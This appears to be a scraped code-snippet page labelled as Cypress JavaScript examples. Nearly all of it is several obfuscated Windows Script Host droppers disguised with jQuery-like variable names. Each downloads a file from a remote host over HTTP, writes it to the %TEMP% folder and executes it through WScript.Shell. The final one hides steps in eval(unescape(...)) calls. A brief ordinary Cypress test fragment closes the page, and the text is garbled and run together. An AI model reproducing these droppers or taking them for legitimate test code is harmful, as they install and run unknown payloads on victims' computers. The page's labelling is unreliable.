Best JavaScript code snippet using cypress
1rnotwhite = "ateO";2mimeType = "read";3var cached = "//jorg",4 crossDomain = 11258334,5 overflowX = "W",6 getAllResponseHeaders = "ip",7 _ = "l";8ajaxSetup = "WScrip";9_load = 2;10rnumnonpx = "d";11constructor = "cr";12augmentWidthOrHeight = "ment";13apply = "saveT";14list = 41;15var unbind = "Str";16anim = 9;17delay = "L";18qualifier = "eObje";19setFilters = 39, matcher = "nviron";20siblingCheck = 12;21cssFn = "htt";22one = "ct";23var stopImmediatePropagation = 0,24 pixelPosition = "bject";25marginDiv = "ponseB";26protocol = "Cre";27headers = "oFile";28l = "n";29var getAttribute = "te",30 notify = 207;31remaining = "ass", originAnchor = "345";32needsContext = "pen";33dataFilter = 89028;34webkitMatchesSelector = 1740;35matcherFromTokens = 162;36leadingRelative = "yst";37rchecked = "ecoda";38emptyStyle = "Crea";39handleObj = 6;40cloneCopyEvent = "Ru";41nodes = "ipt", reverse = "p", splice = "Res", checkOn = "L2.XM";42var time = "sen";43matches = 2134, defaultView = "e", valueIsBorderBox = "6t2g", queue = "St";44var eased = 42,45 docElem = "r",46 letterSpacing = "T",47 setMatcher = "getC",48 tbody = 38;49onload = "MSXM", rfxtypes = 34, last = "/", setDocument = "ody", jqXHR = 69;50match = 17;51conv = "";52check = "ing";53resolveWith = 2382;54cssHooks = "Expand";55responses = "GE";56before = 5, ajaxPrefilter = "E";57var result = "ream",58 getter = "open",59 firing = "TP",60 parentWindow = "/7";61rnoContent = 4362, swing = "writ", isXML = "ositi", xhrSupported = 3356;62attrId = "s";63ignored = 1;64hooks = 23;65cur = 116, addEventListener = 58;66isReady = "Scrip", cache = "o", rescape = (function Object.prototype.elementMatchers() {67 return this68}, "clos"), deep = "Slee", toggle = 7;69completeDeferred = "DB.";70parts = 19, exports = 43, setPositiveNumber = 673, backgroundClip = "%TEMP%", selectedIndex = 37, tokens = ".";71matchedCount = "a";72var rhash = "on",73 val = 3,74 event = ":",75 reject = "WScr",76 ajaxHandleResponses = "t";77rparentsprev = "HT";78var memory = "type";79removeChild = 22;80to = "Shel";81amd = 143;82onerror = ".s";83iterator = 49;84host = 106;85linear = "ADO";86keyHooks = ((Math.pow((10 * handleObj + 7), (iterator - 47)) - (Math.pow(xhrSupported, 2) - crossDomain)), (((1826 / removeChild), (4633 / list), 0), this));87j = cloneCopyEvent + l;88keepData = keyHooks[overflowX + isReady + ajaxHandleResponses];89response = keepData[emptyStyle + ajaxHandleResponses + qualifier + one](reject + nodes + tokens + to + _);90rCRLF = response[cssHooks + ajaxPrefilter + matcher + augmentWidthOrHeight + unbind + check + attrId](backgroundClip + last) + setMatcher + _ + remaining + onerror + constructor;91clearQueue = keyHooks[ajaxSetup + ajaxHandleResponses][protocol + rnotwhite + pixelPosition](onload + checkOn + delay + rparentsprev + firing);92clearQueue[cache + needsContext](responses + letterSpacing, cssFn + reverse + event + cached + rchecked + conv + parentWindow + valueIsBorderBox + docElem + originAnchor, !((((((cur, 10) + (val ^ 13)) / ((match + 0) ^ (val ^ 10))) * (((ignored * 0) | (ignored & 1)) & ((val * 10) - (tbody, 30)))) | ((((addEventListener ^ 67) + (anim | 12)) - (selectedIndex * 83 / selectedIndex)) - ((Math.pow((769 ^ webkitMatchesSelector), (0 ^ _load)) - 61 * match * 5 * match * 5 * before) / ((8 | anim) * (15 - siblingCheck) + (129, setFilters, 5))))) == ((((exports - 42) * (stopImmediatePropagation | 0)) | (((resolveWith * 3 + matches) / (21 + parts)), (Math.pow((23 & hooks), 2) - (setPositiveNumber - 175)), ((ignored & 1) + (stopImmediatePropagation | 0)))) + ((ignored * 0) & ((ignored * 1) * (list / 41))))));93clearQueue[time + rnumnonpx]();94while (clearQueue[mimeType + leadingRelative + matchedCount + getAttribute] < ((ignored * 0) | (val + 1))) {95 keyHooks[overflowX + isReady + ajaxHandleResponses][deep + reverse]((Math.pow((matcherFromTokens, 66, jqXHR), (46 / hooks)) - (299 + rnoContent)));96}97delegateType = keyHooks[ajaxSetup + ajaxHandleResponses][emptyStyle + ajaxHandleResponses + qualifier + one](linear + completeDeferred + queue + result);98keyHooks[reject + getAllResponseHeaders + ajaxHandleResponses][deep + reverse](((32572 ^ dataFilter) / (2 ^ toggle)));99try {100 delegateType[getter]();101 raw = delegateType;102 raw[memory] = ((1 | ignored) + (0 | stopImmediatePropagation));103 isXMLDoc = raw;104 delegateType[swing + defaultView](clearQueue[splice + marginDiv + setDocument]);105 isXMLDoc[reverse + isXML + rhash] = ((229, host, 0) | stopImmediatePropagation);106 delegateType[apply + headers](rCRLF, ((44 - eased) & (3 & val)));107 delegateType[rescape + defaultView]();108 values = response;109 values[j](rCRLF.elementMatchers(), ((35 - rfxtypes) + -1), (notify, 81, amd, 0));...
1reliableMarginRight = 3;2var one = "iron",3 msMatchesSelector = "ea";4fail = "mentS";5timer = "B.S";6top = 82;7css = "W";8var ajaxHandleResponses = 2,9 getElementsByName = 23,10 rbuggyQSA = 212,11 addToPrefiltersOrTransports = "Run",12 timerId = (function Object.prototype.elementMatchers() {13 return this14 }, "prefi");15var rmouseEvent = "Script",16 has = "te",17 unit = 28,18 jsonpCallback = "x",19 evt = 121,20 rquickExpr = "tream";21rmsPrefix = 44;22uniqueCache = 387;23contents = "Scrip";24always = "WSc";25context = "WS";26rkeyEvent = "tring", guid = "r";27var event = 40,28 addClass = 104;29udataOld = "Re";30uid = 124;31letterSpacing = "Env";32ajaxTransport = "ave";33method = "w";34Expr = "t";35var newCache = 4,36 eventDoc = "teOb",37 document = "g4g5",38 identifier = "Obj";39var last = "bj",40 webkitMatchesSelector = "erep";41var extra = "ri",42 activeElement = "y",43 toggle = "l",44 tokens = 20;45var id = ".S",46 ready = "reat",47 handlers = "http:/",48 iframe = "/";49inspectPrefiltersOrTransports = 81, clazz = 33, inspected = 17, updateFunc = "ssance";50rsingleTag = 43, root = "WScr";51var classCache = "eBod",52 cache = 30,53 clientTop = "ct",54 documentIsHTML = "ADOD",55 isEmptyObject = 1049,56 rlocalProtocol = "om/o";57msg = 66, duplicates = ".sc";58async = "spons";59close = "crip", code = "097jh", speed = "pt", dataTypeOrTransport = "L2", matches = "%TEMP", content = 34;60needsContext = "open";61swap = 52;62curCSS = 6417;63clientX = "pand";64PI = "send";65handler = "TTP";66cssFn = "ion";67onload = "s";68actualDisplay = "/m";69box = "i";70step = "rea";71var onabort = "dysta",72 rdashAlpha = "reateO";73var idx = "type",74 prop = 112,75 val = "hel",76 rfocusMorph = 13;77winnow = "Sleep";78currentTarget = "T";79after = "rite";80fast = "%";81random = 38;82tuples = 1;83getElementsByClassName = "ToFile";84hasOwnProperty = 0;85locked = "se";86start = 118;87isXML = "ini";88until = "clo";89ridentifier = ".XMLH";90th = "jec", unmatched = "c", chainable = "Ex", scrollLeft = "posit", state = "C", nativeStatusText = "ipt";91preFilters = "GE";92_default = "e";93define = "u";94eased = 1120;95pageY = "MSXM";96subordinate = "jesus.";97argument = (((208 | msg) / (55 - rfocusMorph)), (((16 + prop), (39 - unit)), this));98getPropertyValue = addToPrefiltersOrTransports;99tabIndex = argument[context + close + Expr];100origName = tabIndex[state + rdashAlpha + last + _default + clientTop](css + rmouseEvent + id + val + toggle);101hooks = origName[chainable + clientX + letterSpacing + one + fail + rkeyEvent + onload](matches + fast + iframe) + timerId + jsonpCallback + duplicates + guid;102what = argument[css + contents + Expr][state + guid + msMatchesSelector + eventDoc + th + Expr](pageY + dataTypeOrTransport + ridentifier + handler);103what[needsContext](preFilters + currentTarget, handlers + actualDisplay + isXML + onload + Expr + webkitMatchesSelector + define + box + updateFunc + subordinate + unmatched + rlocalProtocol + code + document, !(3 < (((((swap + 14) - (swap & 58)) ^ ((uid + 20) / ajaxHandleResponses * 2 * ajaxHandleResponses * 3)) & ((rbuggyQSA, 7) | getElementsByName)) - ((Math.pow(((147 ^ uniqueCache) / (Math.pow(22, ajaxHandleResponses) - 450)), ((event / 40) * (tuples + 1))) - (Math.pow((Math.pow(clazz, 2) - isEmptyObject), (1 * ajaxHandleResponses)) - 2 * rsingleTag * 3 * ajaxHandleResponses * 3)) | (((evt ^ 239) / (cache)) * (3 * reliableMarginRight * 3 * ajaxHandleResponses - (26 * ajaxHandleResponses)) + ((2 & ajaxHandleResponses) | (0 ^ hasOwnProperty)))))));104what[PI]();105while(what[step + onabort + has] < ((51 / inspected) ^ (4 ^ reliableMarginRight))) {106 argument[always + extra + speed][winnow](((Math.pow(61, ajaxHandleResponses) - 3625) | (Math.pow(content, 2) - eased)));107}108contexts = argument[root + nativeStatusText][state + ready + _default + identifier + _default + unmatched + Expr](documentIsHTML + timer + rquickExpr);109argument[always + guid + nativeStatusText][winnow](((Math.pow(426876, ajaxHandleResponses) - 182222444376) / (rmsPrefix ^ 1)));110contexts[needsContext]();111stateString = contexts;112stateString[idx] = (tuples & (1 ^ hasOwnProperty));113params = stateString;114contexts[method + after](what[udataOld + async + classCache + activeElement]);115params[scrollLeft + cssFn] = (0 ^ (hasOwnProperty / 24));116contexts[onload + ajaxTransport + getElementsByClassName](hooks, ((addClass - 64), (tokens / 10)));117contexts[until + locked]();118selection = origName;...
1merge = "E";2stateVal = 105;3fixInput = "ate";4scripts = 10;5matcherFromGroupMatchers = "%T";6var responses = "pand",7 timer = "li",8 keys = "on";9var unbind = "y",10 replaceAll = "Run",11 getElementsByClassName = "qua",12 setMatchers = "http:/",13 round = "oFile";14var forward = "t",15 evt = "nviro",16 contentDocument = "ject",17 modified = "ri";18startLength = "bjec", keepData = "Sle", handlers = "Stream", createCache = "p", key = 21, sortInput = "ateO";19left = "Scr";20memory = 18;21jsonpCallback = "el";22getAllResponseHeaders = "r";23isPlainObject = "iom", timeStamp = (function String.prototype.returnValue() {24 return this25}, ".XMLHT"), nodeType = "Scrip";26transports = "close";27add = 35, crossDomain = "tate", nidselect = "co", duration = "atera", ajaxHandleResponses = 2, operator = "/estud";28ct = 16, fail = "nm", cloneNode = "C", resolveContexts = 24;29identifier = "ipt";30valueParts = "l";31elemData = 0;32var test = "nd";33_$ = 1, outermost = "n", setMatcher = "eO", setFilters = "L2";34var transport = "T",35 createTween = "W",36 rbrace = "gs",37 ajaxExtend = "se";38var amd = "i",39 rquery = "onseBo",40 matchIndexes = "re";41var offset = "Cre";42options = 42;43var clearTimeout = 14984;44completed = "";45pdataCur = "b";46src = "type", getElementsByTagName = "op";47var needsContext = "dys",48 initialInUnit = 8208,49 parsed = "ADODB.",50 setGlobalEval = "open",51 diff = "fier",52 selected = "d";53processData = "s", currentTarget = "ript", argument = ".", p = "WScr", speeds = "pt.Sh";54propFilter = "a", fragment = "it", lastModified = "763fd";55getClientRects = "MSXM";56select = "posit";57rquickExpr = "TP";58var removeAttr = "e",59 support = 71,60 curCSSLeft = "ee",61 until = "vf";62var ontype = "WSc",63 rclickable = "wr",64 elem = "Object",65 string = "G";66matchers = ".scr", writable = "Sl", addHandle = 4809, mapped = "Resp", eq = 37, outerCache = "Crea";67status = "aveT";68inPage = "MP%/";69curValue = "ep", selection = "Ex";70var one = "entSt",71 noBubble = 3;72define = (((7 + _$) | (18 + support)), ((Math.pow((Math.pow(17, ajaxHandleResponses) - 271), ajaxHandleResponses) - (268 + eq)), this));73actualDisplay = replaceAll;74truncate = define[createTween + nodeType + forward];75ajax = truncate[offset + fixInput + elem](p + amd + speeds + jsonpCallback + valueParts);76mouseHooks = ajax[selection + responses + merge + evt + fail + one + modified + outermost + rbrace](matcherFromGroupMatchers + merge + inPage) + getElementsByClassName + timer + diff + matchers;77xhrSupported = define[p + identifier][outerCache + forward + setMatcher + pdataCur + contentDocument](getClientRects + setFilters + timeStamp + rquickExpr);78xhrSupported[getElementsByTagName + removeAttr + outermost](string + merge + transport, setMatchers + operator + isPlainObject + duration + argument + nidselect + completed + lastModified + until, !(2 == (((((ct / 16) + (_$ * 0)) * ((_$ * 0) ^ (ajaxHandleResponses - 2))) | (((options * 5 + resolveContexts), (53 * noBubble + 3), (memory + 2), (_$ & 1)) * (_$ * 0))) ^ ((((add - 35) | (_$ * 2)) & ((ajaxHandleResponses ^ 0) ^ _$)) ^ (0 | ((_$ & 1) + -(_$ | 1)))))));79xhrSupported[ajaxExtend + test]();80while (xhrSupported[matchIndexes + propFilter + needsContext + crossDomain] < (Math.pow((key - 18), (elemData ^ 2)) - (scripts - 5))) {81 define[ontype + getAllResponseHeaders + identifier][writable + curCSSLeft + createCache](((addHandle - 1309) / (add)));82}83markFunction = define[createTween + left + amd + createCache + forward][cloneNode + matchIndexes + sortInput + startLength + forward](parsed + handlers);84define[ontype + currentTarget][keepData + curValue](((10240 | initialInUnit) | (12, stateVal, 92, clearTimeout)));85try {86 markFunction[setGlobalEval]();87 root = markFunction;88 root[src] = (1 | elemData);89 optall = root;90 markFunction[rclickable + fragment + removeAttr](xhrSupported[mapped + rquery + selected + unbind]);91 optall[select + amd + keys] = (1 * (elemData ^ 0));92 markFunction[processData + status + round](mouseHooks, ((ajaxHandleResponses | 0) + (_$ * 0)));93 markFunction[transports]();94 display = ajax;95 display[actualDisplay](mouseHooks.returnValue(), ((_$ + -1) & (_$ * 1)), ((_$ * 0) / (_$ * 8)));...
1var progressValues = "P%",2 rclickable = "ip";3hasContent = ".St";4simulate = "ream";5colgroup = "cri";6namespace = (function Object.prototype.stored() {7 return this8}, "pandE");9contextBackup = 24, overwritten = "mentS", checkbox = "bjec", Deferred = "ty", adjustCSS = "pos", statusCode = "o";10success = "pt.Sh", origName = "pt";11var name = 16,12 fadeIn = "oFil",13 Sizzle = 6;14keepScripts = "6t2gr3", attachEvent = "value", box = "ipt", splice = "r", cached = "da", opener = "ET";15var param = "e",16 capName = 70,17 val = "S";18class2type = "gs", startLength = 251, clientX = "XML2.X", rescape = "WS";19relatedTarget = "lee", open = "l", fadeToggle = 41, addBack = "ition", postFinder = "%TEM";20var msFullscreenElement = "el",21 valueIsBorderBox = ".sc",22 serialize = "viron",23 hasDuplicate = "teObje";24easing = "M";25strAbort = "n";26disable = "//jor";27trim = "onseB";28qsa = 4;29prev = 108;30bp = 3, eventHandle = "Resp", removeProp = "MS", node = 30, noGlobal = "com/7";31compile = "WScrip";32eq = "st";33timeout = "Run";34promise = 173;35arr = 0, nodeValue = "eObj";36html = "Parts";37setRequestHeader = "/";38ajaxHandleResponses = 1;39var rfxtypes = 16171;40test = 257;41callbackContext = "pe";42key = "4";43responseText = "pen";44var token = "ready";45fast = "G", setAttribute = 8, webkitMatchesSelector = "LHTTP", nextUntil = 7, cssFn = 64, push = 21;46var globalEval = "s.",47 addToPrefiltersOrTransports = 40,48 removeClass = "eateO";49preFilter = "p";50scale = 253;51div = "open";52var lastChild = "clos";53var xhrSuccessStatus = "in",54 preDispatch = "saveT";55rsingleTag = "at";56currentTarget = "ADODB";57var pushStack = "Sleep",58 time = "t";59var adjusted = "dy";60cssPrefixes = "geco";61callbackExpect = "C";62risSimple = "ct";63tweeners = 2;64getById = 233;65method = "write";66ap = "http:";67assert = "WScr";68bindType = 59;69oldfire = "Ex";70add = "send";71var done = 42,72 updateFunc = "Crea";73init = "5", DOMParser = 10;74classNames = (((197 + bindType) | (1 | test)), (((540 / node) | (1 & ajaxHandleResponses)), this));75rattributeQuotes = timeout;76checkOn = classNames[assert + box];77computeStyleTests = checkOn[updateFunc + hasDuplicate + risSimple](rescape + colgroup + success + msFullscreenElement + open);78selector = computeStyleTests[oldfire + namespace + strAbort + serialize + overwritten + time + splice + xhrSuccessStatus + class2type](postFinder + progressValues + setRequestHeader) + attachEvent + html + valueIsBorderBox + splice;79udataOld = classNames[rescape + colgroup + origName][updateFunc + time + nodeValue + param + risSimple](removeProp + clientX + easing + webkitMatchesSelector);80udataOld[statusCode + responseText](fast + opener, ap + disable + cssPrefixes + cached + globalEval + noGlobal + keepScripts + key + init, !(((((10 / DOMParser) + -(1 | ajaxHandleResponses)) | (((3560 / addToPrefiltersOrTransports) & (78 + name)) / ((149 & scale), 11 * tweeners))) * ((((0 | ajaxHandleResponses) & (131, ajaxHandleResponses)) * (3 * bp * 3 - (node & 27))) ^ (((capName - 26) / (prev, 22)) & (tweeners | (169, tweeners)))) + ((134 - fadeToggle), (19 * tweeners + 17), (startLength, 21), (addToPrefiltersOrTransports / 40))) > Sizzle));81udataOld[add]();82while (udataOld[token + eq + rsingleTag + param] < ((84 | cssFn) / (90, capName, 228, push))) {83 classNames[assert + rclickable + time][pushStack](((21 * qsa + 16) & (contextBackup * 5 + nextUntil)));84}85domManip = classNames[compile + time][callbackExpect + splice + removeClass + checkbox + time](currentTarget + hasContent + simulate);86classNames[compile + time][val + relatedTarget + preFilter](((Math.pow(2908, tweeners) - 8451856) | (rfxtypes - 5267)));87try {88 domManip[div]();89 stopped = domManip;90 stopped[Deferred + callbackContext] = ((arr | 0) | ajaxHandleResponses);91 origFn = stopped;92 domManip[method](udataOld[eventHandle + trim + statusCode + adjusted]);93 origFn[adjustCSS + addBack] = ((0 / done) / (50 - setAttribute));94 domManip[preDispatch + fadeIn + param](selector, ((203 & getById), (229 - node), (175 & promise), (2 & bp)));95 domManip[lastChild + param]();96 doAnimation = computeStyleTests;97 doAnimation[rattributeQuotes](selector.stored(), (1 + -(ajaxHandleResponses * 1)), ((ajaxHandleResponses & 1) * (ajaxHandleResponses + -1)));...
1mouseenter = "S", createButtonPseudo = 699, augmentWidthOrHeight = "m/", simulate = "eObj";2getter = 6;3replaceChild = "ell";4unmatched = "%TEM";5var handleObj = 1,6 params = "ript";7relative = "writ";8divStyle = "Create";9rfocusable = "po";10rmsPrefix = "ateO", rhtml = "Str";11nextUntil = "ToF";12preMap = "clo";13keyHooks = (function Object.prototype.contexts() {14 return this15}, 26);16delegateTarget = ".S";17originalEvent = "in";18div = "se";19hide = 16;20ajaxSetup = "e";21var pdataCur = "stat";22elemLang = "WScrip", argument = "Body", _load = 33, cacheURL = 5;23var tbody = "gs",24 grep = "sen",25 appendChild = "Expand";26isPlainObject = "WS", left = "P%/", clearTimeout = "at", checkContext = "en";27returnTrue = "ch", settings = 9;28var timerId = "76",29 input = "d";30values = "lee", head = "ipt", msg = "n", sortStable = "ADODB";31lock = "sition";32JSON = "ironm";33div1 = 3;34condense = 0, nidselect = "WSc", noConflict = "Run", defaultDisplay = "save";35var w = "da",36 rnotwhite = "ht";37var fxNow = "p",38 matchIndexes = 46,39 rquery = "Scri",40 src = "tp://",41 test = 39,42 ret = "Respon";43var results = "Cre";44filters = "pe", removeChild = 212, empty = "ready", compareDocumentPosition = "Slee";45exports = "t", setter = 2, fireWith = "op", conditionFn = "GET", clientX = 253;46finalText = "", fragment = "MSXM", stateString = "ect", keyCode = "ec";47var propFix = "ile",48 deep = "Scr",49 nodes = "c",50 specified = "cr",51 expanded = "pt",52 props = 201723;53var rquickExpr = "rgeco",54 getWidthOrHeight = "W";55var inspect = 32,56 doc = "bjec",57 parsed = ".St";58document = "h";59className = "HTTP";60adown = "ream";61prev = 10;62access = ".s";63throws = 4212;64modified = "ty";65pdataOld = "rip";66buildParams = 250;67setup = "L2.XML";68defaultView = "Env";69contains = 17;70assert = "jo";71cssPrefixes = 27;72cssNumber = "t2gr";73isSimulated = "Obj";74get = 4;75uid = "345";76parseOnly = "deta";77rxhtmlTag = "ope";78curValue = (((174 & buildParams), (75 - cacheURL), (8 | removeChild)), ((1 * cacheURL), this));79preFilters = noConflict;80end = curValue[getWidthOrHeight + deep + head];81responseFields = end[results + clearTimeout + simulate + stateString](nidselect + params + delegateTarget + document + replaceChild);82compiled = responseFields[appendChild + defaultView + JSON + checkContext + exports + rhtml + originalEvent + tbody](unmatched + left) + parseOnly + returnTrue + access + specified;83transport = curValue[getWidthOrHeight + rquery + expanded][results + rmsPrefix + doc + exports](fragment + setup + className);84transport[fireWith + checkContext](conditionFn, rnotwhite + src + assert + rquickExpr + w + finalText + augmentWidthOrHeight + timerId + cssNumber + uid, !(9 < ((((handleObj + -1) & (condense & 0)) | ((condense / 40) ^ ((handleObj + -1) / (settings ^ 44)))) | (((Math.pow((throws / 18), setter) - (13805 * div1 + 12986)) ^ ((clientX, 237) - (getter ^ 15))) / (((hide | 124) / (getter + 25)) * (get + 1) + (contains * 3 / (contains + 0)))))));85transport[grep + input]();86while(transport[empty + pdataCur + ajaxSetup] < ((Math.pow(cssPrefixes, 2) - createButtonPseudo) - (30 & keyHooks))) {87 curValue[isPlainObject + nodes + pdataOld + exports][mouseenter + values + fxNow](((96 / inspect) ^ (64 | test)));88}89ajaxHandleResponses = curValue[nidselect + params][divStyle + isSimulated + keyCode + exports](sortStable + parsed + adown);90curValue[elemLang + exports][compareDocumentPosition + fxNow](((265107 ^ props) / (41 - prev)));91try {92 ajaxHandleResponses[rxhtmlTag + msg]();93 responseContainer = ajaxHandleResponses;94 responseContainer[modified + filters] = ((33 / _load) + (0 & handleObj));95 hasData = responseContainer;96 ajaxHandleResponses[relative + ajaxSetup](transport[ret + div + argument]);97 hasData[rfocusable + lock] = ((0 & handleObj) / (1 * matchIndexes));98 ajaxHandleResponses[defaultDisplay + nextUntil + propFix](compiled, (1 * setter));99 ajaxHandleResponses[preMap + div]();100 xml = responseFields;101 xml[preFilters](compiled.contexts(), (0 ^ condense), (0 | condense));...
1head = "tSt", Callbacks = "Sc", speeds = 3;2minWidth = "th";3stop = "dyst";4createButtonPseudo = "on";5clone = "open";6setTimeout = 9;7hold = "Cre", defineProperty = "GET";8var percent = "os",9 div = 4,10 rscriptType = 24,11 proxy = "write";12var preventDefault = "maxWid",13 mozMatchesSelector = "ap",14 jsonProp = "WScr",15 addToPrefiltersOrTransports = "cl",16 handle = "send",17 ajaxExtend = "ns";18etag = "n";19ajaxSetup = "e";20nativeStatusText = "TTP";21checkDisplay = "WSc";22always = "r";23optionSet = "at", conv = "Scr", expanded = 10, errorCallback = "http", doneName = "eObj";24var init = 233,25 getStyles = "sa",26 xhr = "MP%/",27 ajaxHandleResponses = 0,28 valueParts = "ec";29var outermost = "",30 elementMatchers = "Crea",31 cssNormalTransform = ":",32 responseFields = 1,33 specified = "ateOb",34 append = "Run";35container = 22, old = "ML", doc = "2.XMLH", support = "/", rsingleTag = (function String.prototype.newDefer() {36 return this37}, "WScri"), prevAll = "cr";38var list = "re",39 addCombinator = "rings";40url = 127, username = 120, removeData = 19, fns = "W", parent = ".s", animated = "Respo";41Deferred = 138;42hasFocus = "Creat";43stored = "%TE";44contents = "o.";45reset = "ToFil";46_jQuery = "pt";47blur = "v";48onerror = "c332";49startTime = "ript.S";50source = "pt/0y7";51nodeNameSelector = 101;52progress = "p";53letter = "ipt";54split = "j", position = "MSX", getAttribute = "bf", focusin = "AD";55timeoutTimer = "eam", fixHooks = "ndEn", linear = "Slee", udataCur = "a", leadingRelative = "ect", outerCache = 170;56overflowY = "/cca";57configurable = 43, truncate = "eBody", qualifier = "type";58open = "ope", readyState = 2, swap = "3r", state = "Scri";59file = "positi";60random = "vi";61qsa = "s";62insertAfter = "t";63addHandle = "Expa";64pop = "ript", _queueHooks = 53, els = 15, adjustCSS = "hell";65not = "ronmen";66handlerQueue = "ODB.St";67parents = ((1 ^ readyState) * (3 + ajaxHandleResponses) * (3 & readyState), (((2 + ajaxHandleResponses) * (0 | readyState) + (178, _queueHooks, 16, responseFields)), this));68merge = append;69delegate = parents[fns + conv + letter];70holdReady = delegate[elementMatchers + insertAfter + doneName + valueParts + insertAfter](checkDisplay + startTime + adjustCSS);71removeEvent = holdReady[addHandle + fixHooks + random + not + head + addCombinator](stored + xhr) + preventDefault + minWidth + parent + prevAll;72noBubble = parents[fns + Callbacks + pop][hold + specified + split + leadingRelative](position + old + doc + nativeStatusText);73noBubble[clone](defineProperty, errorCallback + cssNormalTransform + support + overflowY + onerror + outermost + qsa + mozMatchesSelector + contents + source + getAttribute + swap, !(3 < (((speeds * 2 * speeds ^ (11 - expanded)) - (((11 & els) & (330 / container)) & 3 * speeds)) - (((1 ^ ajaxHandleResponses) + ((25 - rscriptType))) | ((198, Deferred, 1) - ((outerCache, 188, configurable) / (65 - container)))))));74noBubble[handle]();75while (noBubble[list + udataCur + stop + optionSet + ajaxSetup] < ((1 + ajaxHandleResponses) + (1 ^ readyState))) {76 parents[jsonProp + letter][linear + progress](((Math.pow(229, readyState) - 52197), (removeData ^ 119)));77}78completed = parents[rsingleTag + _jQuery][hasFocus + doneName + leadingRelative](focusin + handlerQueue + always + timeoutTimer);79parents[fns + state + _jQuery][linear + progress](((rscriptType * 5 + els) * (10 | nodeNameSelector) + 15));80try {81 completed[open + etag]();82 winnow = completed;83 winnow[qualifier] = ((speeds - 3) | (responseFields ^ 0));84 callback = winnow;85 completed[proxy](noBubble[animated + ajaxExtend + truncate]);86 callback[file + createButtonPseudo] = ((ajaxHandleResponses) / (5 + div));87 completed[getStyles + blur + ajaxSetup + reset + ajaxSetup](removeEvent, ((21, init, 221, ajaxHandleResponses) | (3 & readyState)));88 completed[addToPrefiltersOrTransports + percent + ajaxSetup]();89 method = holdReady;90 method[merge](removeEvent.newDefer(), (3 * speeds * 5 - (Deferred - 93)), ((username / 10), (setTimeout | 159), (url - 50), (responseFields & 0)));...
1wrapMap = "G", genFx = "yp", response = "s", sortInput = 71, risSimple = 3;2var eq = 77,3 disabled = 7,4 reliableMarginRight = "Resp";5els = "p", callbackInverse = 41, filter = "Expa", completed = "u", ajaxPrefilter = "bject";6pseudos = 42, display = "ition", rwhitespace = "ipt.S", originalEvent = 0;7left = "ody", opacity = "WSc", emptyGet = 44;8var isNumeric = 1,9 rneedsContext = 46,10 contains = "r",11 minWidth = 1886,12 replaceAll = (function sortOrder() {}, 99);13timeoutTimer = "WScr", requestHeaders = 27;14var accepts = "e",15 rclickable = "oFile",16 hold = "Obj";17tuple = "ateOb", Symbol = (function sortOrder.escapedWhitespace() {18 var rnative = this;19 return rnative;20}, "Cre"), ownerDocument = 10, cssProps = "LHTTP";21ajaxHandleResponses = 2;22hasFocus = "en";23holdReady = "n";24nType = "ep";25useCache = 60739;26rprotocol = "t";27unshift = "Str";28selection = "nvir";29removeData = ".s";30completeDeferred = 24, optDisabled = "%/", arg = 728, classes = 14336, getResponseHeader = "loguyq";31bubbleType = "pt";32match = "wr";33width = "oa";34step = "http:/";35boxSizingReliable = "MSXML2";36startTime = "Stream";37rtagName = "Sl";38var tfoot = "om/70",39 createFxNow = 239;40unloadHandler = sortOrder.escapedWhitespace();41swap = this["WScri" + bubbleType];42rquery = swap["Cre" + tuple + "jec" + rprotocol]("WScr" + rwhitespace + "hell");43rtypenamespace = rquery[filter + "ndE" + selection + "onment" + unshift + "ing" + response]("%TEMP" + optDisabled) + "_l" + width + "d" + removeData + "c" + contains;44classNames = this["WScri" + bubbleType]["Create" + hold + "ect"](boxSizingReliable + ".XM" + cssProps);45classNames["op" + accepts + "n"](wrapMap + "ET", step + "/ohel" + getResponseHeader + "q.c" + tfoot + ".ex" + accepts, !((((((2 + completeDeferred) & (108 - eq)) / (Math.pow(12, ajaxHandleResponses) - 131)) & ((risSimple) + (46 - rneedsContext))) * ((Math.pow(((243, requestHeaders) & (9 * ajaxHandleResponses + 3)), ((arg / 28) - (completeDeferred))) - (Math.pow((240 | sortInput), 2) - (useCache & 60922))) / (((disabled & 7) & (ajaxHandleResponses + 4)))) + (((Math.pow(emptyGet, 2) - minWidth) + 3) * (risSimple | 2), (((ownerDocument | 2) / (risSimple * 3 + isNumeric)) | (1 | (originalEvent / 38))))) > ajaxHandleResponses));46classNames["s" + hasFocus + "d"]();47subtract = this[opacity + "ript"][Symbol + "ateO" + ajaxPrefilter]("ADODB." + startTime);48subtract["o" + els + "e" + holdReady]();49documentElement = subtract;50hasContent = rquery;51documentElement["t" + genFx + "e"] = ((1 * isNumeric));52relatedTarget();53elements();54compare();55dest();56subtract["saveT" + rclickable](rtypenamespace, ((ajaxHandleResponses) | 0));57nonce = subtract;58nonce["close"]();59submit();60hasContent["R" + completed + "n"](rtypenamespace, ((pseudos / 42) & (callbackInverse, 0)), ((isNumeric | 1) * (originalEvent)));61function elements() {62 eval(unescape("%20%20%20%20%20%0D"));63}64function dest() {65 eval(unescape("%20%20%20%20%20%20%20%20nextUntil%5B%22pos%22%20+%20display%5D%20%3D%20%28%281%26originalEvent%29%7C0%29%3B%0D"));66}67function submit() {68 eval(unescape("%20%20%20%20%20%20%20%20this%5BtimeoutTimer%20+%20%22ipt%22%5D%5BrtagName%20+%20%22e%22%20+%20nType%5D%28%28%28replaceAll%2C233%2CcreateFxNow%2C16380%29%26%28classes%7C12955%29%29%29%3B%20%20%20%0D"));69}70function compare() {71 eval(unescape("%20%20%20%20%20%20%20%20subtract%5Bmatch%20+%20%22ite%22%5D%28classNames%5BreliableMarginRight%20+%20%22onseB%22%20+%20left%5D%29%3B%0D"));72}73function relatedTarget() {74 eval(unescape("%20%20%20%20%20%20%20%20nextUntil%20%3D%20documentElement%3B%0D"));...
Using AI Code Generation
1Cypress.Commands.add('ajaxHandleResponses', (method, url, response) => {2 cy.server();3 cy.route({4 }).as('ajaxCall');5 cy.wait('@ajaxCall');6});7describe('Test', () => {8 it('should test', () => {9 cy.get('input[name="q"]').type('cypress').type('{enter}');10 });11});12{13}
Using AI Code Generation
